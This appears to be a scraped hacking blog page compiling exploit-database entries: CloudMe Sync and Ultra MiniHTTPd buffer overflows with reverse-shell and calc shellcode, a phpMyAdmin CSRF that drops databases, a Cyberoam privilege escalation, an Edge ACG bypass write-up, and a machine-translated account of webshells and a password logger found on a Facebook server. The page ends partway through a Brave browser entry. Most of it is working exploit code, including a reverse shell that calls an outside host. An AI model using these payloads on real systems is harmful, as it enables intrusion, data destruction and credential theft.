#######################################################
# Exploit Title: Local Buffer Overflow on CloudMe Sync v1.11.0
# Date: 08.03.2018
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1110.exe
# Category: Local
# Exploit Discovery: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 1.11.0
# Tested on: Windows 7 SP1 x86
# CVE: CVE-2018-7886
# Solution: Update CloudMe Sync to 1.11.2
#######################################################
#Disclosure Date: March 12, 2018
#Response Date: March 14, 2018
#Bug Fixed: April 12, 2018
# Run this file in victim's win 7 sp1 x86 system where CloudMe Sync 1.11.0 has been installed.
import socket
target="127.0.0.1"
junk="A"*1052
eip="\x7B\x8A\xA9\x68" #68a98a7b : JMP ESP - Qt5Core.dll
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.1 LPORT=4444 -f c
shellcode=("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x02\x01\x68"
"\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44"
"\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56"
"\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff"
"\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")
payload=junk+eip+shellcode
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(payload)
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863567026
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
Each Edge Content process (MicrosoftEdgeCP.exe) needs to call SetProcessMitigationPolicy() on itself to enable ACG. The callstack when this happens is:
00 KERNELBASE!SetProcessMitigationPolicy
01 MicrosoftEdgeCP!SetProcessDynamicCodePolicy+0xc0
02 MicrosoftEdgeCP!StartContentProcess_Exe+0x164
03 MicrosoftEdgeCP!main+0xfe
04 MicrosoftEdgeCP!_main+0xa6
05 MicrosoftEdgeCP!WinMainCRTStartup+0x1b3
06 KERNEL32!BaseThreadInitThunk+0x14
07 ntdll!RtlUserThreadStart+0x21
The issue is that one MicrosoftEdgeCP.exe can OpenProcess() another MicrosoftEdgeCP.exe as long as they are in the same App Container. So MicrosoftEdgeCP.exe process A can race MicrosoftEdgeCP.exe B when it still doesn't have ACG enabled and tamper with it in such a way that process B never enables ACG.
Having another MicrosoftEdgeCP.exe process not enable ACG is pretty straightforward as SetProcessDynamicCodePolicy consults a number of global variables to determine if ACG should be enabled or not. For example, in IEIsF12Host(), which is called from GetDynamicCodeRestrictionsEnablementState, two global variables (at offsets 0x23092 and 0x23090 in the Edge version we tested on, up-to-date on Windows 10 version 1709) are checked, and if they are both nonzero, ACG is not going to get enabled. Thus it is sufficient for process A to OpenProcess() and call a single WriteProcessMemory() with a known address (note: we assume ASLR is already defeated at this point) in order to disable ACG.
When process A disables ACG in process B it is possible to further tamper with process B and get it to allocate executable memory and run arbitrary payload either in process A or process B.
A debug log below demonstrates how it is indeed possible to OpenProcess() and WriteProcessMemory() from one MicrosoftEdgeCP.exe to another. All that is left to prove is that this race is winnable. To demonstrate that, we wrote a small program that scans the processes and whenever a new MicrosoftEdgeCP.exe appears, it patches it as described above. In our experiments this reliably disables ACG for all of the MicrosoftEdgeCP.exe processes created after the PoC program runs. The Visual Studio project for the PoC is attached. It is also possible to run the PoC in Edge's App Container, which proves that an Edge Content Process has access to all of the functionality needed to exploit the issue.
To demonstrate two MicrosoftEdgeCP.exe processes can tamper with each other, select two processes in the same App Container (all Content Processes for Internet sites should be in the same container) and attach a debugger to one of them.
0:061> r rip=kernelbase!openprocess
0:061> r rcx=28 # PROCESS_VM_WRITE | PROCESS_VM_OPERATION
0:061> r rdx=0
0:061> r r8=e84 # pid of the other process
0:061> p
...
After OpenProcess() completes we can see that it was successful and that the returned handle has the value of 0x698.
0:061> r
rax=0000000000000698 rbx=0000000000000000 rcx=00007ff87c720344
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
rip=00007ff878c8dc6d rsp=00000082622dfe28 rbp=0000000000000000
r8=00000082622dfdb8 r9=0000000000000000 r10=0000000000000000
r11=0000000000000246 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
Then, we can test writing to the other process's memory with
0:061> r rip=kernelbase!writeprocessmemory
0:061> r rcx=698 # handle returned from OpenProcess()
0:061> r rdx=00007ff7`b8483090 # base of MicrosoftEdgeCP.exe + 0x23090
0:061> r r8=00000082`622dfef0 # address of buffer to write
0:061> r r9=3 # size of data to write
0:061> p
...
After it completes we see that the return value is 1 which indicates success:
0:061> r
rax=0000000000000001 rbx=0000000000000000 rcx=0000000000000000
rdx=0000000000000000 rsi=0000000000000000 rdi=0000000000000000
rip=00007ff878cca1d6 rsp=00000082622dfe28 rbp=0000000000000000
r8=00000082622dfcf8 r9=00000082622dfdd1 r10=0000000000000000
r11=0000000000000246 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
You can also attach a debugger to the other process and verify that the data was written correctly.
Microsoft's reply: "First, thank you for reporting this to us. Our engineering team does agree with your assessment. The approach we are taking to address this issue is moving the enablement of ACG to process creation time rather than deferring until after the process has started. Our plan of action would be not to address it through a hotfix, but instead in the next release of Windows."
Regarding severity, as with the other mitigation bypasses, note that this issue can't be exploited on its own. An attacker would first need to exploit an unrelated vulnerability to gain some capabilities in the Edge content process (such as the ability to read and write arbitrary memory locations), after which they could use this vulnerability to gain additional capabilities (namely, the ability to run arbitrary machine code).
The issue was identified by James Forshaw and Ivan Fratric.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44467.zip
# Exploit Title: phpMyAdmin 4.8.0 < 4.8.0-1 - Cross-Site Request Forgery
# Date: 2018-04-20
# Software Link: https://www.phpmyadmin.net/
# Author: @revengsh & @0x00FI
# CVE: CVE-2018-10188
# Category: Webapps
#1. Description
#The vulnerability exists due to failure in the "/sql.php" script to properly verify the source of HTTP request.
#This Cross-Site Request Forgery (CSRF) allows an attacker to execute arbitrary SQL statement by sending a malicious request to a logged in user.
#2. Proof of Concept: This example sends HTTP GET crafted request in order to drop the specified database.
<html>
<body>
<a href="http://[HOST]/phpmyadmin/sql.php?sql_query=DROP+DATABASE+[DBNAME]">
Drop database
</a>
</body>
</html>
#3. Solution: Upgrade to phpMyAdmin 4.8.0-1 or newer.
#4. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10188
# Exploit Title: Sophos Cyberoam UTM - Privilege Escalation
# Date: 31/08/2016
# Exploit Author: Chintan Gurjar (Frogy)
# Vendor Homepage: http://www.sophos.com/
# Software Link: https://www.cyberoam.com/downloads/datasheet/CR25iNG.html
# Version: Cyberoam CR25iNG - 10.6.3 MR-5
# CVE : CVE-2016-7786
# Category : Webapps
# CVSS Score: 9.3
Description
===========
A vulnerability, which was classified as critical, has been found in Sophos Cyberoam UTM CR25iNG 10.6.3 MR-5. This issue affects an unknown function of the file Licenseinformation.jsp of the component Access Restriction. The manipulation with an unknown input leads to a privilege escalation vulnerability. Using CWE to declare the problem leads to CWE-264. Impacted are confidentiality, integrity, and availability.
The weakness was released 04/07/2017. The advisory is shared for download at infosecninja.blogspot.in. The identification of this vulnerability is CVE-2016-7786 since 09/09/2016. The attack may be initiated remotely. The successful exploitation needs a single authentication. Technical details of the vulnerability are known.
Upgrading to version 10.6.5 eliminates this vulnerability.
Steps to reproduce
===================
1. Login with admin user account.
2. Navigate to the dashboard and observe all GET URLs through burp proxy. Save URLs.
3. Logout and login with a low privileged user account who does not have even read/write/execution permission.
4. Access saved admin functionality URLs with a low privileged user account.
5. Access the admin information from the user account.
Video Demonstration
====================
https://www.youtube.com/watch?v=unV3-DdIxXw&t=2s
PoC
===============
Request:
GET /corporate/webpages/dashboard/LicenseInformation.jsp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;1=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.1/corporate/webpages/index.php
Cookie: JSESSIONID=120g9lzj467ivba7uvbf9ej73
Connection: close
Response:
HTTP/1.1 200 OK
Date: Wed, 31 Aug 2016 06:59:56 GMT
X-Frame-Options: SAMEORIGIN
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=2592000
Expires: Fri, 30 Sep 2016 06:59:56 GMT
Vary: Accept-Encoding
Content-Length: 1828
Connection: Close
...
<table width="100%" cellpading="1" cellspacing="1">
<tr>
<td class="tableheader_gadget" align="center"><label
id='Language.Time'></label></td>
<td class="tableheader_gadget" align="center"><label
id='Language.User'></label></td>
...
Affected URLs
===============
http://192.168.1.1/corporate/webpages/dashboard/ApplianceInformation.jsp
http://192.168.1.1/corporate/webpages/dashboard/IPSRecentAlerts.jsp
http://192.168.1.1/corporate/webpages/dashboard/HTTPVirusDetected.jsp
...Many others...
References
===============
https://infosecninja.blogspot.co.nz/2017/04/cve-2016-7786-sophos-cyberoam-utm.html
https://vuldb.com/?id.99371
https://www.cvedetails.com/cve/CVE-2016-7786/
https://nvd.nist.gov/vuln/detail/CVE-2016-7786
#!/usr/bin/python
# Title: Zortam Mp3 Media Studio Local Buffer Overflow (SEH)
# Author: Kevin McGuigan
# Twitter: @_h3xagram
# Author Website: https://www.7elements.co.uk
# Vendor Website: http://www.zortam.com/
# Version: 23.45
# Tested on: Windows 7 32 bit
# Date: 12/04/2018
# Vendor did not respond to advisory
# File > Add Disk to Mp3 Library > paste string from zortamPOC.txt into directory field
filename="zortamPOC.txt"
junk = "A" * 268
nseh = "B" * 4
seh="C" * 4
fill = "D" *900
buffer = junk + nseh + seh + fill
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
0x00ストーリーの前に書かれた
侵入テスターとして、私はクライアント側の弱点と比較してサーバー側の攻撃を好みます。サーバーを直接制御し、シェルを操作するためのアクセス許可を取得できるのは良いことです。もちろん、完全な浸透が発生した場合、あらゆる形態の弱さを過小評価することはできません。実際の浸透中、サーバーをより完全に制御するために、クライアント側の筋力の組み合わせが必要になる場合があります。ただし、弱点を探している場合でも、サーバーに直接入力して、危険でサーバーに直接駆動できる弱点を見つけることを好みます。 Facebookが世界でますます人気があり、より多くのユーザーがいるので、私は常にターゲットに浸透しようとするという考えを持っていました。たまたま、Facebookが2012年にバグバウンティバウンティハンターメカニズムを持ち始め、浸透にもっと興味を持っていました。
一般的に言えば、浸透の観点から、習慣性はデータの収集と検出から始まります。まず、ターゲットの「範囲」がインターネット上の大きさの大きさを定義します。開始する機会がある場所を評価できます。たとえば、
Googleハッキングはどのような情報を得ることができますか?
セグメントBにはいくつのIPがありますか?セグメントCのIPS?
誰?逆whois?
どのドメイン名がありますか?内部で使用されるドメイン名は?次に、サブドメインの推測とスキャンを行います
企業は通常どのテクノロジーと機器を使用したいですか?
Github、Pastebinに漏れた情報はありますか?
…等
もちろん、バグバウンティでは、無制限に攻撃することはできません。バグバウンティで許可されている範囲と遭遇する範囲の交差点は、あなたが試すことができる本当の目標です。
一般的に言えば、大企業による浸透で発生する可能性が高い問題については、いくつかの例について説明します。
ほとんどの大企業では、「ネットワークの境界」を考慮するのがより困難であり、問題になりやすいです。会社がより大きく、オンラインで数千または数万台のマシンがある場合、管理者が各マシンを考慮することは困難です。攻撃と防御では、防衛は片側を防御する必要がありますが、攻撃は突破するポイントを見つけるだけです。したがって、弱い人と比較して、攻撃者はネットワークの境界にあるマシンのみを見つけて、イントラネットに侵入して侵入し始めます!
「ネットワークデバイス」のセキュリティ認識は比較的弱いです。ネットワークデバイスは通常、管理者にさらなる操作を提供するシェルを提供しないため、デバイス自体が提供するインターフェイスによってのみ設定できます。そのため、通常はデバイスの防御はネットワークレイヤーからですが、デバイス自体の0日または1日に遭遇すると、侵略されることさえありません。
「ソーシャルワークライブラリ」の台頭により、浸透のプロセスが非常に簡単になる場合があります。公開情報から会社の従業員リストを見つけてから、ソーシャルワークライブラリからVPNにログインできる従業員のパスワードを見つけ、特にソーシャルワークライブラリの数が増加し、「量が定性的な変化になる」場合にイントラネットの浸透を開始します。主要な人々のパスワードがソーシャルワークライブラリにある限り、会社のセキュリティは完全に破られます。
Facebookの弱点を探しているとき、彼らは彼らの通常のアイデアに浸透します。 Facebook独自のドメイン名を照会することに加えて、情報の収集を開始すると、登録されたメールアドレスを覆します。興味深いドメイン名を誤って発見しました。
tfbnw.net
TFBNWは「TheFaceBook Network」の略語のようです
次に、以下のサーバーは公開情報から存在することがわかります。
vpn.tfbnw.net
おお! vpn.tfbnw.netはジュニパーSSL VPNログインインターフェイスのように見えますが、バージョンは最新のものであり、直接搾取可能な弱点はありませんが、これは内部ストーリーを入力することでもあります。
TFBNWは、Facebookで内部で使用されるドメイン名のようです。同じネットワークセグメントでvpn.tfbnw.netをスキャンするとどうなりますか?
メールサーバーOutlook Webアプリ
F5 BIGIP SSL VPN
Cisco ASA SSL VPN
Oracle E-Business
MobileIron MDM
これらのマシンから、このネットワークセグメントはFacebookにとって比較的重要なネットワークセグメントであるべきであり、すべてのストーリーがここから始まることを大まかに判断できます。
0x01早期脱力感コレクション
同じネットワークセグメントで、特別なサーバーが見つかりました
files.fb.com
files.fb.comログインインターフェイス
ロゴとフッターから判断すると、Accellionの安全なファイル転送(以下、FTAと呼ばれる)である必要があります。
FTAは、ドキュメント送信を保護する製品であり、ユーザーはドキュメントをオンラインで共有および同期できるようにし、AD、LDAP、Kerberosなどの単一のサインオンメカニズムを統合できます。エンタープライズバージョンはSSL VPNサービスもサポートしています。
FTAについて私が最初に見たのは、搾取される公共の悪用があるかどうかをインターネットで検索することでした。 Exploitは最近HD Mooreによって発見され、Rapid7で公開されました。
Accellionファイル転送アプライアンスの脆弱性(CVE-2015-2856、CVE-2015-2857)
弱点では、「/tws/getstatus」で漏れたバージョン情報を使用できるかどうかを直接判断できます。 files.fb.comが発見されたとき、このバージョンは脆弱な0.18から0.20にアップグレードされました。ただし、アドバイザリーでリークされたコードから、FTAの執筆スタイルのように感じられます。あなたが探求し続けるなら、それでも問題があるかもしれません。そのため、戦略は0日間のFTA製品を探し始めます!
ただし、実際のブラックボックスメソッドから問題は見つかりません。そのため、方向を100ボックステストに変更する方法を見つける必要がありました。元のFTAコードをさまざまな方法で取得した後、最終的に調査を開始できます!
FTA製品全体の一般的なアーキテクチャ
Webインターフェイスは、主にPerlとPHPで構成されています。
元のPHPコードは、Ioncubeによって暗号化されています
PerlのDaemonsは彼らのプロジェクトで多くを運営しています
まず、イオンキュードパーツを復号化します。製品が漏れなくなるのを防ぐために、多くのデバイスが元のコードを暗号化します。幸いなことに、FTAのIonCudeバージョンは最新のものではないため、既製のツールを使用して復号化できます。ただし、PHPバージョンの問題により、詳細と数値操作は自分で修理する必要がある場合があります。
単純なソースコード監査の後、すべての簡単な弱点はすべてRapid7によって発見されるべきであることがわかりました。
認証を必要とする脆弱性はあまり役に立たないので、私はそれをより深く掘り下げなければなりませんでした!
数日間の慎重な調査の後、合計7つの弱点が発見されました。
クロスサイトスクリプトX 3
Auth Pre-Auth SQLインジェクションは、リモートコードの実行につながります
既知の秘密キーは、リモートコードの実行につながります
ローカル特権エスカレーションx 2
Facebookセキュリティチームに脆弱性を報告することに加えて、残りの脆弱性は、Accellionの技術文書を提出するためのアドバイザリーにも書かれています。パッチ付きCERT/CCをメーカーに提出した後、4つのCVE番号が取得されます。
CVE-2016-2350
CVE-2016-2351
CVE-2016-2352
CVE-2016-2353
詳細な弱点の詳細は、完全な開示ポリシーの後に発表されます!
Pre-Auth SQLインジェクションを使用してWebShellに書き込みます
実際の侵入中にサーバーに入った後に最初に行うことは、現在の環境があなたにとって有用であるかどうかを確認することです。サーバー上の永続的なアクセス許可を維持できるようにするために、サーバー上の制限とレコードがどのようなものであるかを可能な限り理解し、発見される可能性のあるリスクを回避する必要があります。p
Facebookには、ほぼ次の制限があります:
ファイアウォールは外部ネットワーク、TCP、UDP、53、80、443に接続できません
リモートSyslogサーバーが存在します
auditdレコードをオンにします
外部から接続できないのは少し面倒なようですが、ICMPトンネルは実現可能であるようですが、これは単なるバグバウンティプログラムです。実際、あまり面倒である必要はなく、純粋にウェブシェルで操作されています。
0x02浸透テストプロセス
Facebookセキュリティチームに報告するために脆弱性の証拠が収集されたように、Webログからいくつかの奇妙な痕跡が見られたように見えました。
最初に、「/var/opt/apache/php_error_log」に奇妙なphpエラーメッセージが表示されました。これは、コード実行の変更によるエラーのようです。
PHPエラーログ
エラーメッセージのパス分析に従って、彼の前任者が残した疑わしいウェブシェルバックドアを見つけます
FacebookサーバーのWebShell
いくつかのファイルの内容は次のとおりです。
sshpass
そうです、あのsshpass
bn3d10aw.php
?php echo shell_exec($ _ get ['c']);
uploader.php
?php move_uploaded_file($ _ files ['f] [' tmp_name ']、basename($ _ files [' f '] [' name ']));
D.PHP
?php include_oncce( '/home/seos/courier/remote.inc'); echo decrypt($ _ get ['c']);
クライアント\ _user \ _class \ _standard.inc
?php
include_once( 'sclient_user_class_standard.inc.orig');
$ fp=fopen( '/home/seos/courier/b3dke9sqaa0l.log'、 'a');
$ retries=0;
$ max_retries=100;
//省略.
fwrite($ fp、date( 'y-m-d h:i:s t')。 ';'。$ _server ['remote_addr']。 http_build_query($ _ get)。
//省略.
最初のいくつかは非常に標準的なPHPトロイの木馬です
より特別なものは、ファイル「slient_user_class_standard.inc」です。
パスワードを元々検証したPHPプログラムの「SCLIENT_USER_CLASS_STANDARD.INC.ORIG」のinclude_Onceをincluded beding、Hackerはプロキシを作成し、中央で重要な操作を実行するときにGET、投稿、およびCookieの値を記録しました。
整理した後、ハッカーはパスワード検証場所でプロキシを作成し、Facebookの従業員のアカウントパスワードを記録し、Webディレクトリに記録されたパスワードを保存しました。ハッカーは、時々時々wgetを使用していました。
wget https://files.fb.com/courier/b3dke9sqaa0l.log
パスワードを記録しました
ログレコードからは、ユーザーのアカウントパスワードに加えて、FTAファイルからの電子メールコンテンツもあります。記録されたアカウントのパスワードは定期的に回転します(後で言及しますが、これはまだXDです)
2/1から2/7で記録された最後の回転は、約300のアカウントとパスワードレコードを含むことがわかりました。そのほとんどは「@fb.com」または「@facebook.com」の従業員アカウントとパスワードでした。この問題は少し深刻です。 FTAでは、ユーザーがログインする2つの主要なモードがあります。
一般ユーザーによって登録されているパスワードハッシュはデータベースに存在し、sha256 +塩によって保存されています
Facebookの従業員(@fb.com)は統一された認証を使用し、LDAPを使用して広告で認証
このログレコードでは、実際の従業員アカウントのパスワードが漏れました。 **推測**このアカウントのパスワードは、FacebookのメールOWA、VPN、その他のサービスにアクセスできるようにして、さらに浸透する必要があります.
さらに、この「ハッカー」はあまりよく慣れていない場合があります:p
すべてのバックドアパラメーターはGETを使用して渡され、そのフットプリントはWebログで明確に見つけることができます。
ハッカーは、いくつかのコマンド操作を実行する際にSTDERを考慮しなかったため、Webログ内の多くのコマンドのエラー情報が発生しました。これから、ハッカーがどのような操作を行ったかを見ることができます。
ハッカーはaccess.logから数日ごとに観察して、記録されたアカウントのパスワードをクリアすることができます
192.168.54.13-17955 [2016年1月23日19:04336010 +0000 | 1453575850] 'get /courier/custom_template/1000/bn3dl0aw.php?c=./sshpass -p' ********* 'ssh -v -o stricthostkeychecking=no soggycat@localhost' cp/home/seos/courier/b3dke9sqa0l. /home/seos/courier/b3dke9sqaa0l.log.2; echo /home/seos/courier/b3dke9sqaa0l.log '2/dev/stdout http/1.1' 200 2559 .
パッケージファイル:
CAT TMP_LIST3_2 |読み取りライン。 cp/home/filex2/1000/$ lineファイルを実行します。 2/dev/stdoutを完了しました
tar -CZVF files.tar.gzファイル
内部ネットワーク構造を検出します
Archibus.thefacebook.comを掘ります
telnet archibus.facebook.com 80
Curl http://archibus.thefacebook.com/spaceview_facebook/locator/room.php
Records.fb.comを掘ります
Telnet Records.fb.com 80
Telnet Records.fb.com 443
WGET -O- -Q http://192.168.41.16
ACME.facebook.comを掘ります
./sshpass -p '*********' ssh -v -o stricthostkeychecking=no soggycat@localhost 'for $(seq 201 1 255); $ in $(seq 0 1 255)を行う; do echo '192.168。$ i。$ j:`dig +short ptr $ j。$ i.168.192.in-addr.arpa`';終わり; done '2/dev/stdout
.
シェルスクリプトを使用してイントラネットをスキャンしますが、stderrのクリーンアップを忘れてください
内部LDAPに接続してみてください
SH: -C: Line 0:の構文エラーが予想外のトークン `( '
SH: -C: LINE 0: `LDAPSEARCH -V -X -H LDAPS: //LDAP.THEFACEBOOK.COM -B CN=SVC -ACCELLION、OU=サービスアカウント、DC=The FaceBook、DC=com -w '*********
内部ネットワークリソースにアクセスしてみてください
(メールOWAに直接アクセスできるように見えます…)
-20:38336009--https://mail.thefacebook.com/
mail.thefacebook.comの解決. 192.168.52.37
mail.thefacebook.comへの接続| 192.168.52.37 | :443 .接続。
HTTPリクエストが送信され、応答を待っています. 302が見つかりました
場所: https://mail.thefacebook.com/owa/[フォロー]
-20:38:10--https://mail.thefacebook.com/owa/
既存の接続をmail.thefacebook.com:443に再利用します。
HTTPリクエストが送信され、応答を待っています. 302は一時的に移動しました
場所: https://Mail.thefacebook.com/owa/auth/logon.aspx?url=https://mail.thefacebook.com/owa/reason=0 [以下]
-20:38:10--- https://mail.thefacebook.com/owa/auth/logon.aspx?url=3https://mail.thefacebook.com/owa/Reason=0
既存の接続をmail.thefacebook.com:443に再利用します。
HTTPリクエストが送信され、応答を待っています. 200 OK
長さ: 8902(8.7k)[Text/HTML]
to:「stdout」を節約する
0k .. 100%1.17g=0s
20:38:10(1.17 gb/s) - ` - '保存[8902/8902]
-20:38:33--(try:15)https://10.8.151.47/
10.8.151.47:443への接続. -20:38336051- https://SVN.THEFACEBOOK.COM/
svn.thefacebook.comの解決.失敗:名前またはサービスは不明です。
-20:39:03--https://SB-dev.thefacebook.com/
sb-dev.thefacebook.comの解決.失敗:名前またはサービスが不明です。
失敗:接続がタイムアウトしました。
再試行。
SSL秘密鍵に浸透してみてください
sh:/etc/opt/apache/ssl.crt/server.crt:許可が拒否されました
ls:/etc/opt/apache/ssl.key/server.key:そのようなファイルまたはディレクトリなし
MV:は、そのようなファイルまたはディレクトリを統計できません
sh:/etc/opt/apache/ssl.crt/server.crt:許可が拒否されました
MV:は、そのようなファイルまたはディレクトリを統計できません
sh:/etc/opt/apache/ssl.crt/server.crt:許可が拒否されました
MV:は、そのようなファイルまたはディレクトリを統計できません
sh:/etc/opt/apache/ssl.crt/server.crt:許可が拒否されました
MV:は、そのようなファイルまたはディレクトリを統計できません
sh:/etc/opt/apache/ssl.crt/server.crt:許可が拒否されました
MV:は、そのようなファイルまたはディレクトリを統計できません
sh:/etc/opt/apache/ssl.crt/server.crt:許可が拒否されました
base64:無効な入力
ブラウザから、files.fb.comの証明書資格情報またはWildcard's *.fb.com .
0x03 postscriptの要約
十分な証拠を収集すると、すぐにFacebookセキュリティチームに報告されます。脆弱性の詳細に加えて、レポートには対応するログ、スクリーンショット、タイムレコードXDも含まれています
サーバーのログから、ハッカーがオペレーティングシステムにあるときに明らかな2つの時点があることがわかります。 1つは7月上旬で、もう1つは9月中旬です。
7月上旬のアクションは、サーバーを「見つける」ために記録からより偏っているように見えますが、9月中旬の操作はより悪意があります。 「検索」に加えて、パスワードロガーなども配置しました。2つの時点での「ハッカー」が同じ人であるかどうかについては、同じ人であるかどうかは不明です。p
7月のタイミングは、CVE-2015-2857エクスプロイトが発表される前に角を曲がったところにあり、1日または0日間のシステムによって侵略されたかどうかを知ることは不可能でした。この事件はここに記録されています。全体として、これは非常に興味深い体験XDであり、浸透に関する記事を書く機会も与えてくれます:p
最後に、バグ・バウンのおかげです
# Exploit Title: Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow
# Date: 2018-04-14
# Exploit Author: jollymongrel
# Vendor Homepage: http://www.vector.co.jp
# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html
# Version: 1.2
# Tested on: Windows 7 32-bit
# CVE : CVE-2013-5019
import sys
import socket
import struct
eip = struct.pack('I', 0x764046cd) #call esp [msvcrt.dll]
#windows/exec - 274 bytes
#http://www.metasploit.com
#Encoder: x86/shikata_ga_nai
#EXITFUNC=thread
#CMD=calc.exe
#badchars='\x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f'
shellcode = ("no0bno0b"+"\xb8\x21\xa0\xa2\xbd\xdb\xd1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x3e\x31\x43\x15\x83\xc3\x04\x03\x43\x11\xe2\xd4\x1a\x51\xd8"
"\x25\xbd\x4c\xf4\x90\x35\x55\x0f\x79\x9f\x5c\x5e\x45\x5c\xb5"
"\x5d\x84\x31\x44\x9d\x46\xde\x89\xb2\x1a\x92\xe6\x1d\x26\x1d"
"\xa1\xb0\xfa\x6c\x5a\x1e\xf7\xb7\xb6\xfb\x71\xbf\x2a\x51\xb6"
"\x2a\x53\x27\x2a\x43\x49\x67\xe7\x66\x6a\x6e\xe3\x10\x46\x27"
"\xe5\x1f\xc5\xb5\xad\x32\x57\x38\xd3\x66\xa8\xa7\xf8\xe0\xfc"
"\x1a\x33\xce\x22\xf0\xad\x34\xff\x3a\x42\x91\x07\x6d\xe5\xf1"
"\x79\x73\xa3\xe9\xbf\xd7\xbf\xa7\x10\x06\xf2\x2c\x81\x6a\xa0"
"\x97\x46\xae\xe7\x33\x1c\x87\x02\x5d\x8d\xd7\x5a\xbe\x7c\xa9"
"\x96\x7f\x04\xbd\xe4\xb5\xbc\xa0\xf5\xf3\x12\x66\x6c\xbc\xb7"
"\xb2\x49\x01\x66\xd3\x8f\x40\x5b\x33\x07\x22\x30\x0e\x11\xc6"
"\x89\xfa\xbc\x18\x0f\x33\x18\xb1\x01\xe0\x53\x4a\x23\xab\x77"
"\x17\x7f\xf8\x4f\xdd\x01\x79\x04\xa6\x82\xe0\xc4\x33\x06\x12"
"\x36\x43\x2d\xc6\x8a\xfb\x24\x67\x4a\xc6\x5a\x4a\x4c\x97\x4c"
"\x1b\x68\x98\xf8\x45\x2d\x86\x43\xbe\x0e\x96\x8f\xca\x89\x7e"
"\x5b\xe1\x8b\xb2\x5f\xd0\x94\xdf\x5e\x7c\x0e\x25\xa5\xf7\xea"
"\x9d\x1b\xa9\x58\x50\x3a\xb8\x77\x16\xb1\x87\x48\x94\x37\x87"
"\x9a\x9d\xe2\xd0")
#egg hunter to search for no0bno0b
egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x6e\x6f\x30\x62\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
payload = "A" * 537
payload += shellcode
payload += "A" * (967 - len(payload))
payload += eip
payload += egghunter
payload += "\xff\xe7" #jmp edi
payload += "C" * (1007 - len(payload))
print "[+] sending payload, length", len(payload)
buf = "GET /"+payload+"HTTP/1.1\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.32.175", 80))
s.send(buf)
data = s.recv(1024)
s.close()
# Exploit Title:Brave Browser < 0.13.0 Denial of Service (resource consumption) via a long alert() argument.
# Date: 2017-10-16
# Exploit Author: Sahil Tikoo
# Vendor Homepage: https://brave.com
# Software Link: https://github.com/brave/browser-laptop
# Version: 0.12.5
# Tested on: Kali Linux,Ubuntu ,Windows OS
# CVE : CVE-2017-18256
#PoC
<html>
<script>
